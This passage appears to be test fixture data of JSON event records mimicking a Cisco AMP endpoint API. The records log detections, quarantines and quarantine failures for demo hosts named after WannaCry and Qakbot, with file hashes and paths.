Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 